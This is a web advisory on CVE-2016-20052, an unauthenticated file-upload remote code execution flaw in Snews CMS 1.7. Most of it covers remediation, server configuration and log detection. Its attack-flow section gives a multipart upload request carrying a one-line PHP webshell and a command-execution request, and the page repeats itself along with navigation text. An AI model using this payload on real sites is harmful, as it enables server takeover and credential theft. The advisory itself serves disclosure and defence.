CVE-2016-20052: Snews CMS 1.7 Unrestricted File Upload Allows Unauthenticated RCE

CVE-2016-20052: Snews CMS 1.7 Unrestricted File Upload Remote Code Execution

A critical unauthenticated remote code execution vulnerability has been formally published to the NIST National Vulnerability Database for Snews CMS 1.7, tracked as CVE-2016-20052 (CVSS 9.8, Critical). The flaw is an unrestricted file upload weakness in the CMS's upload endpoint that allows any unauthenticated attacker to upload arbitrary files — including PHP executables — directly to the snews_files directory, where they can be accessed and executed via the web server.

Vulnerability Overview

Attribute	Value
CVE ID	CVE-2016-20052
CVSS Score	9.8 (Critical)
CWE Classification	CWE-434 — Unrestricted Upload of File with Dangerous Type
Affected Product	Snews CMS 1.7
Attack Vector	Network — no local access required
Privileges Required	None
User Interaction	None
Authentication	Not required
Patch Available	See vendor guidance

Technical Background

Snews is a lightweight PHP-based content management system used by small websites and blogs. The CMS exposes a multipart form-data file upload endpoint that is intended to allow file attachments but fails to enforce any restrictions on file type, extension, or content. This means an attacker can submit a standard HTTP multipart/form-data POST request with a PHP file as the uploaded payload.

The uploaded file is written directly to the snews_files/ directory, which is web-accessible by default. Once uploaded, the attacker simply navigates to the file path to trigger PHP execution by the web server.

Attack Flow

1. Attacker identifies a Snews CMS 1.7 installation
   (version detection via HTTP headers, error messages, or source code comments)
 
2. Attacker crafts a multipart POST request to the upload endpoint:
   POST /index.php (or the upload handler path)
   Content-Type: multipart/form-data; boundary=--boundary
 
   --boundary
   Content-Disposition: form-data; name="file"; filename="shell.php"
   Content-Type: application/octet-stream
 
   <?php system($_GET['cmd']); ?>
   --boundary--
 
3. Server writes shell.php to /snews_files/shell.php
   (no file type validation, no extension filtering, no content inspection)
 
4. Attacker accesses the uploaded webshell:
   GET /snews_files/shell.php?cmd=whoami
 
5. Web server executes the PHP and returns OS command output
   → Full remote code execution achieved

Why This Is Critical

CWE-434 (Unrestricted Upload of File with Dangerous Type) is one of the most severe web application weaknesses because:

Zero authentication barrier: No account or session is needed to exploit this vulnerability
Trivial exploitation: A single crafted HTTP POST request is sufficient to place a PHP webshell
Immediate RCE: The snews_files directory is web-accessible, meaning execution follows upload instantly
No technical skill required: Basic knowledge of HTTP requests or tools like curl is all that is needed
Persistence: The webshell remains on the server until manually removed, surviving restarts

Scope and Exposure

Any Snews CMS 1.7 installation accessible from the network — whether internally or publicly on the internet — is vulnerable without authentication. Exploiting this vulnerability grants execution privileges equivalent to the web server process account (typically www-data on Linux), which may allow:

Filesystem traversal beyond the web root
Credential theft from CMS configuration files (database passwords)
Lateral movement within the host or network
Pivot point for further intrusion into backend infrastructure

Remediation

Immediate Steps

Step 1: Remove or upgrade Snews CMS

Snews CMS 1.7 should be considered end-of-life for production use. If the CMS must remain in place, contact the vendor for patches or manually implement upload restrictions.

Step 2: Remove existing uploaded webshells

Audit the snews_files/ directory for unexpected PHP files:

# Find PHP files in the upload directory
find /var/www/html/snews_files/ -name "*.php" -o -name "*.phtml" -o -name "*.php5"
 
# List all files with recent modification times
ls -lt /var/www/html/snews_files/ | head -20

Step 3: Block PHP execution in the upload directory

Configure the web server to deny script execution within upload directories:

# Apache — add to .htaccess in snews_files/
<FilesMatch "\.(php|php5|phtml|shtml|cgi)$">
    Deny from all
</FilesMatch>
 
Options -ExecCGI
php_flag engine off

# nginx — add inside the snews_files location block
location /snews_files/ {
    location ~ \.php$ {
        return 403;
    }
}

Step 4: Restrict upload endpoint access

If file uploads are not required from the public internet, restrict the upload endpoint to authenticated users or specific IP ranges at the firewall or web server level.

Detection

# Check web server access logs for POST requests to the upload endpoint
grep -E "POST.*snews" /var/log/apache2/access.log
 
# Check for PHP file access in the uploads directory
grep "snews_files.*\.php" /var/log/apache2/access.log
 
# Find recently modified PHP files in the web root
find /var/www/html/ -name "*.php" -newer /var/www/html/index.php -mtime -7

POST requests to the upload handler followed by GET requests to .php files in snews_files/ are strong indicators of exploitation.

Impact Assessment

Impact Area	Description
Remote Code Execution	Arbitrary OS commands via uploaded PHP webshell
Data Exfiltration	Access to CMS database credentials and site content
Persistence	Uploaded webshell survives server restarts
Lateral Movement	Web server process account used as pivot point
Exploitation Barrier	Zero — no authentication, single HTTP request
Availability	Attacker can delete or modify site files

Key Takeaways

CVE-2016-20052 allows unauthenticated RCE in Snews CMS 1.7 via a PHP file uploaded to the publicly accessible snews_files/ directory
CVSS 9.8 (Critical) — the absence of any file type validation or authentication requirement makes this trivially exploitable
Immediate action: Audit the snews_files/ directory, block PHP execution there, and evaluate upgrading or replacing the CMS
Restrict the upload endpoint at the network or application layer if public file uploads are not required
Any Snews CMS 1.7 installation reachable from untrusted networks should be treated as potentially compromised pending audit

Sources

CVE-2016-20052 — NIST NVD

CVE-2016-20052: Snews CMS 1.7 Unrestricted File Upload Remote Code Execution

Vulnerability Overview

Attribute	Value
CVE ID	CVE-2016-20052
CVSS Score	9.8 (Critical)
CWE Classification	CWE-434 — Unrestricted Upload of File with Dangerous Type
Affected Product	Snews CMS 1.7
Attack Vector	Network — no local access required
Privileges Required	None
User Interaction	None
Authentication	Not required
Patch Available	See vendor guidance

Technical Background

Attack Flow

1. Attacker identifies a Snews CMS 1.7 installation
   (version detection via HTTP headers, error messages, or source code comments)
 
2. Attacker crafts a multipart POST request to the upload endpoint:
   POST /index.php (or the upload handler path)
   Content-Type: multipart/form-data; boundary=--boundary
 
   --boundary
   Content-Disposition: form-data; name="file"; filename="shell.php"
   Content-Type: application/octet-stream
 
   <?php system($_GET['cmd']); ?>
   --boundary--
 
3. Server writes shell.php to /snews_files/shell.php
   (no file type validation, no extension filtering, no content inspection)
 
4. Attacker accesses the uploaded webshell:
   GET /snews_files/shell.php?cmd=whoami
 
5. Web server executes the PHP and returns OS command output
   → Full remote code execution achieved

Why This Is Critical

CWE-434 (Unrestricted Upload of File with Dangerous Type) is one of the most severe web application weaknesses because:

Zero authentication barrier: No account or session is needed to exploit this vulnerability
Trivial exploitation: A single crafted HTTP POST request is sufficient to place a PHP webshell
Immediate RCE: The snews_files directory is web-accessible, meaning execution follows upload instantly
No technical skill required: Basic knowledge of HTTP requests or tools like curl is all that is needed
Persistence: The webshell remains on the server until manually removed, surviving restarts

Scope and Exposure

Filesystem traversal beyond the web root
Credential theft from CMS configuration files (database passwords)
Lateral movement within the host or network
Pivot point for further intrusion into backend infrastructure

Remediation

Immediate Steps

Step 1: Remove or upgrade Snews CMS

Snews CMS 1.7 should be considered end-of-life for production use. If the CMS must remain in place, contact the vendor for patches or manually implement upload restrictions.

Step 2: Remove existing uploaded webshells

Audit the snews_files/ directory for unexpected PHP files:

# Find PHP files in the upload directory
find /var/www/html/snews_files/ -name "*.php" -o -name "*.phtml" -o -name "*.php5"
 
# List all files with recent modification times
ls -lt /var/www/html/snews_files/ | head -20

Step 3: Block PHP execution in the upload directory

Configure the web server to deny script execution within upload directories:

# Apache — add to .htaccess in snews_files/
<FilesMatch "\.(php|php5|phtml|shtml|cgi)$">
    Deny from all
</FilesMatch>
 
Options -ExecCGI
php_flag engine off

# nginx — add inside the snews_files location block
location /snews_files/ {
    location ~ \.php$ {
        return 403;
    }
}

Step 4: Restrict upload endpoint access

If file uploads are not required from the public internet, restrict the upload endpoint to authenticated users or specific IP ranges at the firewall or web server level.

Detection

# Check web server access logs for POST requests to the upload endpoint
grep -E "POST.*snews" /var/log/apache2/access.log
 
# Check for PHP file access in the uploads directory
grep "snews_files.*\.php" /var/log/apache2/access.log
 
# Find recently modified PHP files in the web root
find /var/www/html/ -name "*.php" -newer /var/www/html/index.php -mtime -7

POST requests to the upload handler followed by GET requests to .php files in snews_files/ are strong indicators of exploitation.

Impact Assessment

Impact Area	Description
Remote Code Execution	Arbitrary OS commands via uploaded PHP webshell
Data Exfiltration	Access to CMS database credentials and site content
Persistence	Uploaded webshell survives server restarts
Lateral Movement	Web server process account used as pivot point
Exploitation Barrier	Zero — no authentication, single HTTP request
Availability	Attacker can delete or modify site files

Key Takeaways

CVE-2016-20052 allows unauthenticated RCE in Snews CMS 1.7 via a PHP file uploaded to the publicly accessible snews_files/ directory
CVSS 9.8 (Critical) — the absence of any file type validation or authentication requirement makes this trivially exploitable
Immediate action: Audit the snews_files/ directory, block PHP execution there, and evaluate upgrading or replacing the CMS
Restrict the upload endpoint at the network or application layer if public file uploads are not required
Any Snews CMS 1.7 installation reachable from untrusted networks should be treated as potentially compromised pending audit

Sources

CVE-2016-20052 — NIST NVD

CVE-2016-20052: Snews CMS 1.7 Unrestricted File Upload Allows Unauthenticated RCE

Affected Products

CVE-2016-20052: Snews CMS 1.7 Unrestricted File Upload Remote Code Execution

Vulnerability Overview

Technical Background

Attack Flow

Why This Is Critical

Scope and Exposure

Remediation

Immediate Steps

Detection

Impact Assessment

Key Takeaways

Sources

CVE-2016-20049: JAD Java Decompiler Stack-Based Buffer Overflow Enables Arbitrary Code Execution

CVE-2017-20225: TiEmu TI Calculator Emulator Stack Buffer Overflow Allows Arbitrary Code Execution via Command-Line Arguments

CVE-2016-20026: ZKTeco ZKBioSecurity 3.0 Hardcoded Tomcat Credentials Allow Unauthenticated RCE

CVE-2016-20052: Snews CMS 1.7 Unrestricted File Upload Allows Unauthenticated RCE

Affected Products

CVE-2016-20052: Snews CMS 1.7 Unrestricted File Upload Remote Code Execution

Vulnerability Overview

Technical Background

Attack Flow

Why This Is Critical

Scope and Exposure

Remediation

Immediate Steps

Detection

Impact Assessment

Key Takeaways

Sources

CVE-2016-20049: JAD Java Decompiler Stack-Based Buffer Overflow Enables Arbitrary Code Execution

CVE-2017-20225: TiEmu TI Calculator Emulator Stack Buffer Overflow Allows Arbitrary Code Execution via Command-Line Arguments

CVE-2016-20026: ZKTeco ZKBioSecurity 3.0 Hardcoded Tomcat Credentials Allow Unauthenticated RCE